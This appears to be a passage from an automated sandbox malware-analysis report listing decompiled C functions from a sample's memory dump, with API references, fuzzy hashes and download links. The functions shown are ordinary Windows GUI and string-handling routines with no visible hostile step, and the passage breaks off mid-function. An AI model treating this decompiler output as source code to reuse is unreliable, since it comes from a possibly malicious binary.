						return 0;
					}
					_t22 = _a8;
					if(_t22 == 0 ||  *_t22 < 0x28 || SystemParametersInfoA(0x30, 0,  &_v20, 0) == 0) {
						goto L9;
					} else {
						 *((intOrPtr*)(_t22 + 4)) = 0;
						 *((intOrPtr*)(_t22 + 8)) = 0;
						 *((intOrPtr*)(_t22 + 0xc)) = GetSystemMetrics(0);
						_t18 = GetSystemMetrics(1);
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t30 = 1;
						 *(_t22 + 0x10) = _t18;
						 *((intOrPtr*)(_t22 + 0x24)) = _t30;
						if( *_t22 >= 0x48) {
							lstrcpyA(_t22 + 0x28, "DISPLAY");
						}
						return _t30;
					}
				}
				return  *0x439618(_a4, _a8);
			}

APIs

SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00404FA9
GetSystemMetrics.USER32 ref: 00404FC1
GetSystemMetrics.USER32 ref: 00404FC8
lstrcpyA.KERNEL32(?,DISPLAY), ref: 00404FEC

Strings

B, xrefs: 00404F8A
DISPLAY, xrefs: 00404FE6

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: System$Metrics$InfoParameterslstrcpy
String ID: B$DISPLAY
API String ID: 1409579217-3316187204
Opcode ID: fc4978af5ac8f74fb81d04261746e33f8207f39954ecdab6ad15e40bdb5edc53
Instruction ID: 0269e9ff9c82b1da89f60d18f206ef68f762114564e5db41c1733f16ce370355
Opcode Fuzzy Hash: fc4978af5ac8f74fb81d04261746e33f8207f39954ecdab6ad15e40bdb5edc53
Instruction Fuzzy Hash: 0411C6B1600326ABDB119F649C8469BBFA8EF45750B508073FE05AE182D7B9D941CBF8

Uniqueness

Uniqueness Score: -1.00%

Function 0040381D, Relevance: 10.6, APIs: 7, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E0040381D(intOrPtr _a4) {
				long _v8;
				long _v12;
				struct tagMSG _v40;

				if(_a4 != 0) {
					_v8 = GetTickCount();
					while(1 != 0) {
						_v12 = GetTickCount();
						if(_v12 < _v8 || _v12 - _v8 > _a4) {
							break;
						} else {
							if(PeekMessageA( &_v40, 0, 0, 0, 0) == 0) {
								Sleep(1);
							} else {
								GetMessageA( &_v40, 0, 0, 0);
								TranslateMessage( &_v40);
								DispatchMessageA( &_v40);
							}
							continue;
						}
					}
					return 1;
				}
				return 1;
			}

APIs

GetTickCount.KERNEL32 ref: 0040382D
GetTickCount.KERNEL32 ref: 0040383F

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: CountTick
String ID:
API String ID: 536389180-0
Opcode ID: 62664b2ccced0f01c7f848e18cfdb5bd16bdfa6a3194e22d98a032b2161cbf00
Instruction ID: 9bbdf3f7d950dda3c106a7053e01199b699c7596eca1dee1c5b4b451079f442e
Opcode Fuzzy Hash: 62664b2ccced0f01c7f848e18cfdb5bd16bdfa6a3194e22d98a032b2161cbf00
Instruction Fuzzy Hash: 6D11F431A00208EBEB10EFA0D949B9D7BF8AB04705F6081A5F905B61C0D775AB469B99

Uniqueness

Uniqueness Score: -1.00%

Function 00417178, Relevance: 10.5, APIs: 7, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00417178(void* __ecx) {
				struct HBRUSH__* _t14;
				void* _t18;

				_t18 = __ecx;
				 *((intOrPtr*)(_t18 + 0x28)) = GetSysColor(0xf);
				 *((intOrPtr*)(_t18 + 0x2c)) = GetSysColor(0x10);
				 *((intOrPtr*)(_t18 + 0x30)) = GetSysColor(0x14);
				 *((intOrPtr*)(_t18 + 0x34)) = GetSysColor(0x12);
				 *((intOrPtr*)(_t18 + 0x38)) = GetSysColor(6);
				 *((intOrPtr*)(_t18 + 0x24)) = GetSysColorBrush(0xf);
				_t14 = GetSysColorBrush(6);
				 *(_t18 + 0x20) = _t14;
				return _t14;
			}

0x00417180
0x00417188
0x0041718f
0x00417196
0x0041719d
0x004171aa
0x004171b1
0x004171b4
0x004171b6
0x004171bb

APIs

GetSysColor.USER32(0000000F), ref: 00417184
GetSysColor.USER32(00000010), ref: 0041718B
GetSysColor.USER32(00000014), ref: 00417192
GetSysColor.USER32(00000012), ref: 00417199
GetSysColor.USER32(00000006), ref: 004171A0
GetSysColorBrush.USER32(0000000F), ref: 004171AD
GetSysColorBrush.USER32(00000006), ref: 004171B4

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: Color$Brush
String ID:
API String ID: 2798902688-0
Opcode ID: 80a27b1f02e3c58edf4c19fbc6f0daf7df48ddc1e8fb47ec45f2cb1cd70874ec
Instruction ID: 88891574432b8891f472ad4648ce297f27c70735abb480ab9afea6e1339babde
Opcode Fuzzy Hash: 80a27b1f02e3c58edf4c19fbc6f0daf7df48ddc1e8fb47ec45f2cb1cd70874ec
Instruction Fuzzy Hash: 3AF01C71A407489BD730BF729D49B47BBE0FFC4B10F42092EE2858BA91E6B5A401DF44

Uniqueness

Uniqueness Score: -1.00%

Function 0042047F, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 25
registrywindowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0042047F() {
				long _t5;
				int _t6;

				if((0x80000000 & GetVersion()) == 0 || GetVersion() != 4) {
					_t5 = GetVersion();
					if((0x80000000 & _t5) != 0) {
						L6:
						 *0x439628 =  *0x439628 & 0x00000000;
						return _t5;
					}
					_t5 = GetVersion();
					if(_t5 != 3) {
						goto L6;
					}
					goto L5;
				} else {
					L5:
					_t6 = RegisterWindowMessageA("MSWHEEL_ROLLMSG");
					 *0x439628 = _t6;
					return _t6;
				}
			}

0x00420495
0x0042049f
0x004204a3
0x004204bf
0x004204bf
0x00000000
0x004204bf
0x004204a5
0x004204ab
0x00000000
0x00000000
0x00000000
0x004204ad
0x004204ad
0x004204b2
0x004204b8
0x00000000
0x004204b8

APIs

GetVersion.KERNEL32 ref: 0042048C
GetVersion.KERNEL32 ref: 00420497
GetVersion.KERNEL32 ref: 0042049F
GetVersion.KERNEL32 ref: 004204A5
RegisterWindowMessageA.USER32(MSWHEEL_ROLLMSG), ref: 004204B2

Strings

MSWHEEL_ROLLMSG, xrefs: 004204AD

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: Version$MessageRegisterWindow
String ID: MSWHEEL_ROLLMSG
API String ID: 303823969-2485103130
Opcode ID: 26758afab022c1db6d696d894fb3c80caf3662092470fbb9c82adf2f042b39ed
Instruction ID: 25fbbff43e00deea4677d8a477c73a5b9be4ee826b54bccf5d226778cb27c547
Opcode Fuzzy Hash: 26758afab022c1db6d696d894fb3c80caf3662092470fbb9c82adf2f042b39ed
Instruction Fuzzy Hash: DFE0803EF0123646D72137647C0436E66D49F88360FE5D17BDB41423555A7C484346BE

Uniqueness

Uniqueness Score: -1.00%

Function 00426D87, Relevance: 9.2, APIs: 6, Instructions: 182
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E00426D87(void* __ecx) {
				struct HDC__* _t87;
				intOrPtr* _t88;
				struct HDC__* _t97;
				intOrPtr _t98;
				int _t100;
				struct HDC__* _t110;
				int _t122;
				intOrPtr* _t126;
				void* _t136;
				intOrPtr* _t137;
				struct HDC__** _t138;
				int _t153;
				intOrPtr _t157;
				signed short _t171;
				int _t175;
				void* _t178;
				void* _t180;

				E00406520(E0042A133, _t180);
				_t178 = __ecx;
				 *(__ecx + 0x70) =  *(_t180 + 8);
				_t87 = E004131DD(0x3c);
				 *(_t180 + 8) = _t87;
				 *(_t180 - 4) =  *(_t180 - 4) & 0x00000000;
				if(_t87 == 0) {
					_t88 = 0;
					__eflags = 0;
				} else {
					_t88 = E00428824(_t87);
				}
				 *((intOrPtr*)(_t178 + 0x114)) = _t88;
				 *(_t180 - 4) =  *(_t180 - 4) | 0xffffffff;
				 *((intOrPtr*)( *_t88 + 0x3c)) = 0x7009;
				_t175 = 1;
				 *( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t178 + 0x114)))) + 0x5c)) + 0x14) =  *( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t178 + 0x114)))) + 0x5c)) + 0x14) | 0x00000040;
				 *( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t178 + 0x114)))) + 0x5c)) + 0x15) =  *( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t178 + 0x114)))) + 0x5c)) + 0x15) & 0x000000fe;
				 *( *((intOrPtr*)(_t178 + 0x114)) + 8) = _t175;
				_t97 = E004131DD(0x40);
				 *(_t180 + 8) = _t97;
				_t186 = _t97;
				 *(_t180 - 4) = _t175;
				if(_t97 == 0) {
					_t98 = 0;
					__eflags = 0;
				} else {
					_t98 = E00428A66(_t97, _t186);
				}
				 *(_t180 - 4) =  *(_t180 - 4) | 0xffffffff;
				 *((intOrPtr*)(_t178 + 0x74)) = _t98;
				_t100 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t178 + 0x70)))) + 0xf4))( *((intOrPtr*)(_t178 + 0x114)));
				if(_t100 != 0) {
					_t137 = _t178 + 0x78;
					E00419BB7(_t137,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t178 + 0x114)))) + 0x5c)) + 0x10)));
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t178 + 0x74)))) + 0xc))( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t178 + 0x114)))) + 0x5c)) + 0x10)), _t136);
					 *( *((intOrPtr*)(_t178 + 0x74)) + 0xc) = _t175;
					 *(_t178 + 0x84) = _t175;
					 *((intOrPtr*)( *_t137 + 0x1c))();
					_t110 = GetDC( *(_t178 + 0x1c));
					 *(_t180 + 8) = _t110;
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t178 + 0x74)))) + 0x10))(_t110);
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t178 + 0x70)))) + 0xf8))( *((intOrPtr*)(_t178 + 0x74)),  *((intOrPtr*)(_t178 + 0x114)));
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t178 + 0x74)))) + 0x18))();
					ReleaseDC( *(_t178 + 0x1c),  *(_t180 + 8));
					 *((intOrPtr*)( *_t137 + 0x20))(0xffffffff);
					_t138 = _t178 + 0x80;
					 *((intOrPtr*)(_t178 + 0x104)) = GetDeviceCaps( *_t138, 0x58);
					 *((intOrPtr*)(_t178 + 0x108)) = GetDeviceCaps( *_t138, 0x5a);
					_t122 =  *( *((intOrPtr*)(_t178 + 0x114)) + 0x18);
					_t188 = _t122;
					 *(_t178 + 0xf8) = _t122;
					if(_t122 != 0) {
						_t153 =  *(_t178 + 0xf0);
						__eflags = _t122 - _t153;
						if(__eflags > 0) {
							 *(_t178 + 0xf8) = _t153;
						}
					} else {
						 *(_t178 + 0xf8) = _t175;
					}
					 *(_t178 + 0xe8) =  *(_t178 + 0xf8);
					_push(0x42e4b0);
					_push(0x42e4b0);
					_push(_t175);
					_push(_t175);
					_push(_t175);
					E0041AE9C(_t178, _t188);
					_t126 =  *((intOrPtr*)(_t178 + 0x114));
					_t157 =  *((intOrPtr*)( *_t126 + 0x5c));
					_t171 =  *((intOrPtr*)(_t157 + 0x1e));
					if(_t171 >= 0x8000 || (_t171 & 0x0000ffff) - ( *(_t157 + 0x1c) & 0x0000ffff) > 0x7fff) {
						ShowScrollBar( *(_t178 + 0x1c), _t175, 0);
					} else {
						 *((intOrPtr*)(_t180 - 0x24)) = 3;
						 *(_t180 - 0x20) =  *( *((intOrPtr*)( *_t126 + 0x5c)) + 0x1c) & 0x0000ffff;
						 *(_t180 - 0x1c) =  *( *((intOrPtr*)( *_t126 + 0x5c)) + 0x1e) & 0x0000ffff;
						 *(_t180 - 0x18) = _t175;
						if(E00415006(_t178, _t175, _t180 - 0x28, 0) == 0) {
							E00414F60(_t178, _t175,  *(_t180 - 0x20),  *(_t180 - 0x1c), 0);
						}
					}
					E00427C71(_t178,  *((intOrPtr*)( *((intOrPtr*)(_t178 + 0x114)) + 0x14)), _t175);
					_t100 = _t175;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t180 - 0xc));
				return _t100;
			}

APIs

__EH_prolog.LIBCMT ref: 00426D8C
GetDC.USER32(?), ref: 00426E7B
ReleaseDC.USER32 ref: 00426EAF
GetDeviceCaps.GDI32(?,00000058), ref: 00426EC8
GetDeviceCaps.GDI32(?,0000005A), ref: 00426ED8

Part of subcall function 00428824: __EH_prolog.LIBCMT ref: 00428829

ShowScrollBar.USER32(?,00000001,00000000,00000001,00000001,00000001,0042E4B0,0042E4B0), ref: 00426FA0

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: CapsDeviceH_prolog$ReleaseScrollShow
String ID:
API String ID: 603669091-0
Opcode ID: 479707f173c4057112b4671a433d92b04c0141629a29cc01e59d35c96becf872
Instruction ID: f5d210ee154f7f1b627b2ce3caee5c8d10a4320e645ae6f080698531d27b521b
Opcode Fuzzy Hash: 479707f173c4057112b4671a433d92b04c0141629a29cc01e59d35c96becf872
Instruction Fuzzy Hash: E0716870600A00DFCB29DF68D984AAABBF5FF48310F51456EE56ACB3A1DB34E841CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0040A040, Relevance: 9.1, APIs: 6, Instructions: 117
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E0040A040(int _a4, char* _a8, int _a12, short* _a16, int _a20, int _a24, signed int _a28) {
				int _v8;
				intOrPtr _v20;
				short* _v28;
				short _v32;
				int _v36;
				short* _v40;
				void* _v56;
				int _t31;
				int _t32;
				int _t37;
				int _t43;
				int _t44;
				int _t45;
				void* _t53;
				short* _t60;
				int _t61;
				intOrPtr _t62;
				short* _t63;

				_push(0xffffffff);
				_push(0x42f5e8);
				_push(E00409800);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t62;
				_t63 = _t62 - 0x18;
				_v28 = _t63;
				_t31 =  *0x439f04; // 0x1
				if(_t31 != 0) {
					L6:
					if(_t31 != 2) {
						if(_t31 != 1) {
							goto L18;
						} else {
							if(_a20 == 0) {
								_t44 =  *0x439efc; // 0x0
								_a20 = _t44;
							}
							asm("sbb eax, eax");
							_t37 = MultiByteToWideChar(_a20, ( ~_a28 & 0x00000008) + 1, _a8, _a12, 0, 0);
							_v36 = _t37;
							if(_t37 == 0) {
								goto L18;
							} else {
								_v8 = 0;
								E00406830(_t37 + _t37 + 0x00000003 & 0x000000fc, _t53);
								_v28 = _t63;
								_t60 = _t63;
								_v40 = _t60;
								E00406330(_t60, 0, _t37 + _t37);
								_v8 = _v8 | 0xffffffff;
								if(_t60 == 0) {
									goto L18;
								} else {
									_t43 = MultiByteToWideChar(_a20, 1, _a8, _a12, _t60, _v36);
									if(_t43 == 0) {
										goto L18;
									} else {
										_t32 = GetStringTypeW(_a4, _t60, _t43, _a16);
									}
								}
							}
						}
					} else {
						_t45 = _a24;
						if(_t45 == 0) {
							_t45 =  *0x439eec; // 0x0
						}
						_t32 = GetStringTypeA(_t45, _a4, _a8, _a12, _a16);
					}
				} else {
					_push( &_v32);
					_t61 = 1;
					if(GetStringTypeW(_t61, 0x42f5cc, _t61, ??) == 0) {
						if(GetStringTypeA(0, _t61, 0x42f5c8, _t61,  &_v32) == 0) {
							L18:
							_t32 = 0;
						} else {
							_t31 = 2;
							goto L5;
						}
					} else {
						_t31 = _t61;
						L5:
						 *0x439f04 = _t31;
						goto L6;
					}
				}
				 *[fs:0x0] = _v20;
				return _t32;
			}

APIs

GetStringTypeW.KERNEL32(00000001,0042F5CC,00000001,00000000,?,00000100,00000000,00406E03,00000001,00000020,00000100,?,00000000), ref: 0040A07F
GetStringTypeA.KERNEL32(00000000,00000001,0042F5C8,00000001,00000000,?,00000100,00000000,00406E03,00000001,00000020,00000100,?,00000000), ref: 0040A099
GetStringTypeA.KERNEL32(00000000,?,00000100,00000020,00000001,?,00000100,00000000,00406E03,00000001,00000020,00000100,?,00000000), ref: 0040A0CD
MultiByteToWideChar.KERNEL32(00406E03,00000101,00000100,00000020,00000000,00000000,?,00000100,00000000,00406E03,00000001,00000020,00000100,?,00000000), ref: 0040A105
MultiByteToWideChar.KERNEL32(00406E03,00000001,00000100,00000020,?,00000100,?,00000100,00000000,00406E03,00000001,00000020,00000100,?), ref: 0040A15B
GetStringTypeW.KERNEL32(?,?,00000000,00000001,?,00000100,?,00000100,00000000,00406E03,00000001,00000020,00000100,?), ref: 0040A16D

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: StringType$ByteCharMultiWide
String ID:
API String ID: 3852931651-0
Opcode ID: 7978bb901a9e5ef37ad4b01f25115386a243d4b412b3fda7648c38b4a11906ce
Instruction ID: 7d97f644f5b15e7df2d58104b9ea96a21cdc8e77f8ddbf007f82d689378feb8c
Opcode Fuzzy Hash: 7978bb901a9e5ef37ad4b01f25115386a243d4b412b3fda7648c38b4a11906ce
Instruction Fuzzy Hash: 7B41A272600219BFCF219F54CC85EAF3F79EB08350F104536F911E6290D3398961CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00424DFE, Relevance: 9.1, APIs: 6, Instructions: 109
windowCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E00424DFE(intOrPtr __ecx, void* __esi) {
				intOrPtr _t51;
				void* _t53;
				intOrPtr _t58;
				signed int _t59;
				signed int _t77;
				intOrPtr _t84;
				intOrPtr* _t86;
				void* _t88;
				CHAR** _t90;
				void* _t91;

				E00406520(E0042A538, _t91);
				_t84 = __ecx;
				 *((intOrPtr*)(_t91 - 0x1c)) = __ecx;
				_t51 = E00424F37(__ecx,  *((intOrPtr*)(_t91 + 0xc)), 0x14);
				if(_t51 == 0) {
					L19:
					 *[fs:0x0] =  *((intOrPtr*)(_t91 - 0xc));
					return _t51;
				}
				_t97 =  *((intOrPtr*)(_t91 + 8));
				 *((intOrPtr*)(_t91 - 0x18)) = 1;
				if( *((intOrPtr*)(_t91 + 8)) == 0) {
					L18:
					E0042500B(_t84, 1, 1);
					_t51 =  *((intOrPtr*)(_t91 - 0x18));
					goto L19;
				}
				_t53 = SendMessageA( *(_t84 + 0x1c), 0x31, 0, 0);
				_push(0);
				_t88 = _t53;
				E0041A369(_t91 - 0x38, _t97);
				 *(_t91 - 4) = 0;
				 *(_t91 - 0x14) = 0;
				if(_t88 != 0) {
					 *(_t91 - 0x14) = SelectObject( *(_t91 - 0x34), _t88);
				}
				_t86 =  *((intOrPtr*)(_t84 + 0x5c));
				 *(_t91 - 0x10) = 0;
				if( *((intOrPtr*)(_t91 + 0xc)) <= 0) {
					L15:
					if( *(_t91 - 0x14) != 0) {
						SelectObject( *(_t91 - 0x34),  *(_t91 - 0x14));
					}
					 *(_t91 - 4) =  *(_t91 - 4) | 0xffffffff;
					E0041A3DB(_t91 - 0x38);
					_t84 =  *((intOrPtr*)(_t91 - 0x1c));
					goto L18;
				} else {
					_t14 = _t86 + 0x10; // 0x10
					_t90 = _t14;
					do {
						 *((intOrPtr*)(_t91 + 8)) =  *((intOrPtr*)(_t91 + 8)) + 4;
						_t58 =  *((intOrPtr*)( *((intOrPtr*)(_t91 + 8))));
						 *(_t90 - 4) =  *(_t90 - 4) | 0x00000001;
						_t100 = _t58;
						 *_t86 = _t58;
						if(_t58 == 0) {
							_t59 = GetSystemMetrics(0);
							asm("cdq");
							_t77 = 4;
							__eflags =  *(_t91 - 0x10);
							 *(_t90 - 0xc) = _t59 / _t77;
							if(__eflags == 0) {
								_t33 = _t90 - 8;
								 *_t33 =  *(_t90 - 8) | 0x08000100;
								__eflags =  *_t33;
							}
							goto L12;
						}
						if(E00417214(_t90, _t100, _t58) == 0) {
							L14:
							 *((intOrPtr*)(_t91 - 0x18)) = 0;
							goto L15;
						}
						GetTextExtentPoint32A( *(_t91 - 0x30),  *_t90,  *( *_t90 - 8), _t91 - 0x24);
						 *(_t90 - 0xc) =  *(_t91 - 0x24);
						_push(0);
						_push( *_t90);
						_push( *(_t91 - 0x10));
						if(E0041BD0A( *((intOrPtr*)(_t91 - 0x1c))) == 0) {
							goto L14;
						}
						L12:
						_t86 = _t86 + 0x14;
						_t90 =  &(_t90[5]);
						 *(_t91 - 0x10) =  *(_t91 - 0x10) + 1;
					} while ( *(_t91 - 0x10) <  *((intOrPtr*)(_t91 + 0xc)));
					goto L15;
				}
			}

APIs

__EH_prolog.LIBCMT ref: 00424E03
SendMessageA.USER32(0000E800,00000031,00000000,00000000), ref: 00424E3E

Part of subcall function 0041A369: __EH_prolog.LIBCMT ref: 0041A36E
Part of subcall function 0041A369: GetDC.USER32(00000000), ref: 0041A397

SelectObject.GDI32(?,00000000), ref: 00424E5D
GetTextExtentPoint32A.GDI32(?,00000000,?,?), ref: 00424EA5
GetSystemMetrics.USER32 ref: 00424EC7
SelectObject.GDI32(?,?), ref: 00424F04

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: H_prologObjectSelect$ExtentMessageMetricsPoint32SendSystemText
String ID:
API String ID: 3673216194-0
Opcode ID: 5680769445a0563b957df53e84ae2bb9e9ca5e2116424480a2c0b347b83c8ba0
Instruction ID: de80a065bd08caa13eaac1d81a7ee75adb8ed78cffc769f96184ddddc36f8564
Opcode Fuzzy Hash: 5680769445a0563b957df53e84ae2bb9e9ca5e2116424480a2c0b347b83c8ba0
Instruction Fuzzy Hash: 2D419D71A00219EFDB20DF95E8859AEFBB5FF88344F91402AF911A3250C7749A41CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 00420341, Relevance: 9.1, APIs: 6, Instructions: 101
windowCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E00420341(void* __ecx, intOrPtr __edx) {
				intOrPtr _v8;
				struct tagMSG _v32;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t31;
				void* _t33;
				void* _t35;
				void* _t37;
				intOrPtr* _t38;
				void* _t42;
				void* _t44;
				intOrPtr _t55;
				void* _t56;
				void* _t57;
				void* _t59;
				void* _t60;
				void* _t61;
				intOrPtr* _t62;

				_t58 = __edx;
				_t59 = GetCapture;
				_t60 = __ecx;
				if(GetCapture() != 0) {
					L20:
					return 0;
				}
				E00413740(_t61, SetCapture( *( *((intOrPtr*)(_t60 + 0x68)) + 0x1c)));
				if(E00413740(_t61, GetCapture()) !=  *((intOrPtr*)(_t60 + 0x68))) {
					L19:
					E00420031(_t60, _t72);
					goto L20;
				} else {
					while(GetMessageA( &_v32, 0, 0, 0) != 0) {
						_t31 = _v32.message - 0x100;
						if(_t31 == 0) {
							__eflags =  *((intOrPtr*)(_t60 + 0x88));
							if( *((intOrPtr*)(_t60 + 0x88)) != 0) {
								E0041FA60(_t60, _v32.wParam, 1);
							}
							__eflags = _v32.wParam - 0x1b;
							if(__eflags != 0) {
								L18:
								_t33 = E00413740(_t61, GetCapture());
								_t72 = _t33 -  *((intOrPtr*)(_t60 + 0x68));
								if(_t33 ==  *((intOrPtr*)(_t60 + 0x68))) {
									continue;
								}
							}
							goto L19;
						}
						_t35 = _t31 - 1;
						if(_t35 == 0) {
							__eflags =  *((intOrPtr*)(_t60 + 0x88));
							if(__eflags != 0) {
								E0041FA60(_t60, _v32.wParam, 0);
							}
							goto L18;
						}
						_t37 = _t35 - 0xff;
						if(_t37 == 0) {
							_t55 = _v32.pt;
							__eflags =  *((intOrPtr*)(_t60 + 0x88));
							_t58 = _v8;
							_push(_t55);
							_push(_t55);
							_t38 = _t62;
							 *_t38 = _t55;
							 *((intOrPtr*)(_t38 + 4)) = _v8;
							_t56 = _t60;
							if( *((intOrPtr*)(_t60 + 0x88)) == 0) {
								E0041FCEC(_t56, _t59);
							} else {
								E0041F9E4(_t56);
							}
							goto L18;
						}
						_t42 = _t37;
						if(_t42 == 0) {
							__eflags =  *((intOrPtr*)(_t60 + 0x88));
							_t57 = _t60;
							if(__eflags == 0) {
								E0041FE54(_t61, __eflags);
							} else {
								E0041FA94(_t57, _t58, _t59, _t60, __eflags);
							}
							_t44 = 1;
							return _t44;
						}
						if(_t42 == 0) {
							goto L19;
						}
						DispatchMessageA( &_v32);
						goto L18;
					}
					E00429977(_v32.wParam);
					goto L19;
				}
			}

APIs

GetCapture.USER32 ref: 00420352
SetCapture.USER32(?), ref: 00420362
GetCapture.USER32 ref: 0042036E
GetMessageA.USER32 ref: 00420388
DispatchMessageA.USER32 ref: 004203BA
GetCapture.USER32 ref: 00420418

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: Capture$Message$Dispatch
String ID:
API String ID: 3654672037-0
Opcode ID: a20fd4fb0c2347bab3a65a9823309a38aaeff76aa6fb72db20377e06dd9c9868
Instruction ID: 30569a75dd2c4bd339c842e90f3a76f558b8e988fa3a176c692722e66ec8e41b
Opcode Fuzzy Hash: a20fd4fb0c2347bab3a65a9823309a38aaeff76aa6fb72db20377e06dd9c9868
Instruction Fuzzy Hash: 103197717002299BDB21BBA5A8459AFB7E8EF40345FD0C43FA505D2253CE3C9C82D769

Uniqueness

Uniqueness Score: -1.00%

Function 00425A9A, Relevance: 9.1, APIs: 6, Instructions: 85
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 97%

			E00425A9A(long* __ecx, signed int _a4, intOrPtr _a8) {
				void* _v8;
				void* __ebp;
				void* _t28;
				void* _t32;
